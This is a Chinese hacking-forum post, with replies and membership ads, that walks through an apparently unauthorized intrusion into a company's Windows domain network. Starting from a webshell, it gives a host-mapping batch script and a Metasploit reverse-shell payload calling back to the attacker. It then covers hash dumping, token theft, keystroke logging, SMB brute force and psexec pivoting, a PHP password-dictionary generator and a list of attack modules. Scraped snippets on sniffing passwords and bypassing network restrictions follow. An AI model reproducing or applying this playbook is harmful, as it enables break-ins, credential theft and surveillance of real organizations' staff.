我们坚信只有今天付出了，才有机会看到明天的太阳！
现在！加入我们，给你一个气氛优秀的技术圈子
请完成以下验证码
查看: 10142|回复: 9
社区更新Forums
随机图赏Gallery
2017年中旬WEB渗透系列课程-15XSS绕过集合2017年中旬WEB渗透系列课程-14XSS能干什么2017年中旬WEB渗透系列课程-13XSS漏洞检测2017年中旬WEB渗透系列课程-12XSS分析及演示2017年中旬WEB渗透系列课程-11注入的其他姿势2017年中旬WEB渗透系列课程-10基于提交方式注入的分析2017年中旬WEB渗透系列课程-09Mysql注入跨库2017年中旬WEB渗透系列课程-08Mysql注入读写2017年中旬WEB渗透系列课程-07Mysql常规注入2017年中旬WEB渗透系列课程-06Mysql注入分析
metasploit内网渗透
查看: 10142|回复: 9
马上注册，加入HACK80！与我们一起交流。
正式会员需要
才可以下载或查看，没有帐号？
上次web拿到了一枚webshell，因为网站容器为tomcat在system权限下运行，导致我所取得的webshell也继承为system权限，通过执行ipconfig /all 得知机器在内部网络，而通过执行net view可知在域内和这台机器存在关系的机器的名称，一个一个ping名称可以知道相对应的ip地址，但是太慢了，有一个批处理脚本可以使用。@echo off
setlocal ENABLEDELAYEDEXPANSION
@FOR /F &usebackq delims=, & %%J IN (`net view /domain ^|find &命令執行成功& /v ^|find &The command completedsuccessfully.& /v ^|find &命令成功完成& /v ^|find &--& /v ^|find&Domain& /v ^|find && /v ^|find &コマンドは正常に終了しました& /v /i`) do (
@echo =====domain:%%J========
@FOR /F &usebackq eol=; delims=, & %%i in (`net view /domain:%%J^|findstr &\\&`) DO (
@FOR /F &usebackq eol=; tokens=1,2,3* delims=\\& %%a in (`echo %%i`)do (
@FOR /F &tokens=1,2,3,4* usebackq delims=: & %%K IN (`@ping -a -n 1-w 100 %%a ^|findstr &Pinging&`) do (
@echo \\%%L %%M
支持中文简体，繁体，日文系统，其他系统根据脚本添加特征文字就行了。保存为1.bat，运行，过一会儿就可以看到回显了。
image001.png (20.06 KB, 下载次数: 73)
09:54 上传
可以看到内网里面有许多台机器，我的目标就是取得所有机器的权限，如果有域管理员的话自然是取得域管理员的权限了，或者说内网的机器通过某种软件进行管理，又或者。。。因为机器在内网，所以如果我要登录他的远程桌面的话需要将他的3389端口映射到外网上，再去连接，大大影响了连接速度，我可不想点个鼠标两秒钟之后才弹出框来。。既然没有图形环境，那就用命令行呗，上次渗透居然之家内网的时候因为我的机器无法映射到外网，于是得上台外网服务器操作，实在不方便。但是现在我可以把机器映射到外网了，大大方便了我的操作。于是我决定用metasploit到内网里去转一转。首先登录我的虚拟机，/etc/init.d/ssh start启动ssh，物理机连接上就可以了。键入msfconsole启动metasploit
image002.png (25.01 KB, 下载次数: 55)
09:54 上传
因为我要用metasploit进行内网渗透，所以需要先用msfpayload生成一个可执行的payload在目标机器上执行，然后反弹回来shell进行下一步的操作。执行show payloads 显示msf下可用的全部payloads
image004.png (59.12 KB, 下载次数: 54)
09:54 上传
这里我使用windows/meterpreter/reverse_tcp，msf其实还提供了很多的payloads，asp，php，jsp都是可以反弹shell了， 反弹回来的shell的权限取决于web容器的权限。Exit退出msfconsole，使用msfpayload来生成一个exe可执行文件。
image006.png (35.43 KB, 下载次数: 52)
09:54 上传
Windows/meterpreter/reverse_tcp 是我要使用的payload, LHOST 为自己的ip，LPORT 为***的端口，X 选项为生成可执行文件。重新进入msf，使用multi/handler模块在本地进行***。具体看操作。
image008.png (140.79 KB, 下载次数: 58)
09:54 上传
把前面的生成的payload传到服务器上执行之后，自己的机器上就能接收到反弹回来的数据了。
image010.png (38.28 KB, 下载次数: 52)
09:54 上传
关于meterpreter的功能，网上有很多的相关文章，我就不多讲了，只讲一些在后续渗透过程中派上用场了的功能。Meterpreter shell 下执行run hashdump，可以导出机器上的hash值，这些hash值解出来为敏感信息，为后续渗透做铺垫。
image012.png (40.55 KB, 下载次数: 54)
09:54 上传
把这些hash解出来之后发现是FUCKER!@#S@$,貌似没什么规律。看下能否盗取域管理员的令牌，如果域管理员短时间内登陆过机器或者机器上某一项进程是以域管理员的权限运行的，都可以盗取。执行ps来看下当前运行的应用程序以及运行他们的用户。
image015.jpg (42.66 KB, 下载次数: 61)
09:55 上传
并未找到域管理员的痕迹，但是并不排除无法列出域管理员运行的应用程序的可能行。使用incognito模块通过list_tokens来列举所有可用的令牌。
image016.png (33.22 KB, 下载次数: 46)
09:55 上传
非常悲催。。。只好在服务器上尽量多收集一些敏感信息，用以后续的渗透了。执行keyscan_start 开始嗅探管理员的键盘输入，可以通过keyscan_dump来查看结果。下面将通过跳板来对域内其他机器进行渗透。直接看图片吧……懒，不想打字了。
image018.png (43 KB, 下载次数: 60)
09:55 上传
image020.png (36.92 KB, 下载次数: 64)
09:55 上传
下面可以在msfconsole里对域内的机器进行渗透，通过我所取得权限的机器作为跳板。首先是对内网的机器的开放端口进行大概的扫描，可以使用db_nmap，或者使用msf自带的端口扫描。我使用的是scanner/portscan/tcp,还是看操作吧。。。自由发挥
image023.jpg (48.17 KB, 下载次数: 52)
09:55 上传
image024.png (40.54 KB, 下载次数: 61)
09:55 上传
很便捷，也比较容易被发现。扫描的端口主要取决于你的渗透目标，如果你是想要数据的话，自然是着重扫描那些1433，3306,XXXX的端口的机器了，但我只是纯粹显得蛋疼，所以就……接着使用auxiliary/scanner/smb/smb_version来对域内主机的系统版本做一个扫描，扫描到古老的windows 2000系统，都能使用ms08-067来秒。
image027.jpg (56.2 KB, 下载次数: 55)
09:55 上传
只可惜我没成功。下面使用前面破解的hash以及登录名对域内机器进行远程桌面登录测试。Use auxiliary/scanner/smb/smb_login
image028.png (56.24 KB, 下载次数: 61)
09:55 上传
根据选项来填就行了，非常傻瓜的工具。将前面破解hash得到的密码做成字典，赋给PASS_FILE, 用户名做成字典，赋给USER_FILE,把VERBOSE设为false，即不把所有尝试的过程输出，只有成功了才输出。成功使用UPLOAD UPLOAD 登录一台机器，下面使用use windows/smb/psexec来登录目标机器并且执行我的payload返回一个shell，首先需要试一下目标机器能否访问外网。使用auxiliary/admin/smb/psexec_command来执行特定命令来看一下能否访问外网。
image030.png (65.94 KB, 下载次数: 53)
09:55 上传
可以访问外网，那么使用windows/smb/psexec来登录目标机器并且执行我的payload返回一个shell
image032.png (48.43 KB, 下载次数: 61)
09:55 上传
image035.jpg (52.88 KB, 下载次数: 52)
09:56 上传
成功返回一个meterpreter shell，使用hashdump功能导出hash解密，发现一个有趣的现象Administrator --- Fucker!@#S@$& &---&&S24 [172.16.2.216]Administrator --- Fucker!@#S@%& &---& &S25 [172.16.2.209]发现administrator的密码十分相近，仔细看下键盘，终于发现了猫腻。@实际上是2，$是4，%则是5，也就是说机器名S24实际上就是S@$,密码前一段Fucker!@#是不变的字符串。那就简单了，制作密码文件来试试不就知道了。写了段脚本来生成字典，因为内网的机器的名字都在S00到S90之间，于是就有如下脚本&?php$a='~!@#$%^&*()';for ($i=0;$i&=8;$i++){for ($k=0;$k&=9;$k++){echo 'Tempus!@#K'.$a[$i].$a[$k].'&br&';}}?&
生成了字典去尝试登录，成功！这里就不上图了。。。太多了，不好打码。域内所有开放3389的机器全部拿下。其实内网里还有许多linux主机，以及开放了3306还有1433的机器，可以使用一系列的msf模块进行攻击，这里就不讲了，真实的渗透过程做了较大的修改删略，为了保证流畅性，而且渗透远不止上面那种爆破拿shell那么简单，但是不失为一种有效可行的办法。下面附上内网渗透中可能用得上的msf 模块scanner/portscan/syn& && && && && && & SYN端口扫描
scanner/portscan/tcp& && && && && && &&&TCP端口扫描auxiliary/scanner/smb/smb_login& && & SMB登录测试扫描
use windows/smb/psexec& && && && & SMB登录，可用hash登录
auxiliary/scanner/smb/smb_version& &&&系统版本扫描auxiliary/admin/smb/psexec_command&&SMB登录并且执行特定命令admin/mssql/mssql_enum& && && && && &MSSQL枚举
admin/mssql/mssql_exec& && && && && & MSSQL执行sql语句admin/mssql/mssql_sql& && && && && &&&MSSQL查询
scanner/mssql/mssql_login& && && && &MSSQL登陆测试扫描
scanner/mssql/mssql_ping& && && && & 扫描mssql开放端口主机（不止扫描1433tcp端口，1434UDP端口也是探测的项目，因为1433TCP端口可能修改，但是UDP端口不会改）各种针对mssql的exp，search mssql就可以了auxiliary/scanner/ssh/ssh_login& && && &ssh登录
auxiliary/scanner/ssh/ssh_version& && & ssh版本扫描auxiliary/admin/mysql/mysql_enum& &&&mysql枚举auxiliary/admin/mysql/mysql_sql& && & mysql语句执行auxiliary/scanner/mysql/mysql_login& & mysql登录测试扫描以及各种针对mysql的exp，search mysql就可以了····未完，不续了，内网渗透可以讲得太多，我懂得太少。
width:100%">
讲讲SMB RELAY吧
width:100%">
hack80me 发表于
讲讲SMB RELAY吧
08068我好像没成功过
width:100%">
不错，谢谢分享！
width:100%">
有道理。。。
width:100%">
每次看到楼主的帖子都有惊吓！
width:100%">
楼上的说的很多！
width:100%">
很多天不上线，一上线就看到这么给力的帖子！
width:100%">
很有品味！
width:100%">
小弟默默的路过贵宝地~~~
width:100%">
Powered by Discuz! X3.2&&
充值199元即可成为正式会员！
现在成为正式会员即可享受：1、原创课程及工具资源下载 2、内部交流及讲师答疑服务 3、参与团队外包渗透测试项目　破解局域网中不能共享文件的终极之策 1、必须在同一个工作组中。这是前提条件,所有计算机 必须在同一个工作组中。 必须在同一个工作组中 必须在同一个工作组...
现在很多公司或单位都有自已内部局域网, 但相对来说对局域网上网用户限制比较多, 比如 不能上一些网站,不能玩某些游戏,不能上 MSN,端口限制等等,一般就是通过...
破解局域网内不能互访的六大经典问题 关于局域网中不能互访的话题历来都是网管非常关心的, 近来收到各地读者的来信, 提出类 似问题的也相当多, 主要是 Windows98...
破解局域网限速最全教程_互联网_IT/计算机_专业资料。破解局域网限速最全教程 每步都有 只要不是傻子 都会的破解局域网限速 一:装虚拟机 可用注册码: CC542-2...
破解网络密码--Sniffer(嗅探器) 在局域网上,黑客要想迅速获得大量的账号(包括用户名和密码) ,最为有效的手段是使用 Sniffer 程序。Sniffer,中文翻译为嗅探器,是一...
第八招:破解密码--Sniffer(嗅探器) 在局域网上,黑客要想迅速获得大量的账号(包括用户名和密码) ,最为有效的手段是使用 Sniffer 程序。Sniffer, 中文翻译为嗅探器...
破解网络密码--Sniffer(嗅探器) 在局域网上,黑客要想迅速获得大量的账号(包括用户名和密码),最为有效的手段是使用Sniffer程序。Sniffer,中文翻译为嗅探器,是一种...
系统和一些驱动程序自动*** ***好以后,自己启动,进入Windows 下一步 设置计算机怎么样链接网络 根据接入方式选择,假如是局域网接入,选择下面一个选项 下一步 下一...
尽可能地让自己的 wifi 登陆口令复杂,放弃简单数字密码; 在设备中***具有 ARP 局域网防护功能的安全软件,防止被黑客蹭网劫持; 不要随便告诉不可信人员你的无线...
破解局域网限制的艰辛历程。在局域网中如果某些网页无法访问,请看看。破解局域网限制的艰辛历程昨天开始,公司网管开始大面积封锁各类下载网站、各类社交网站,封闭 P2P ...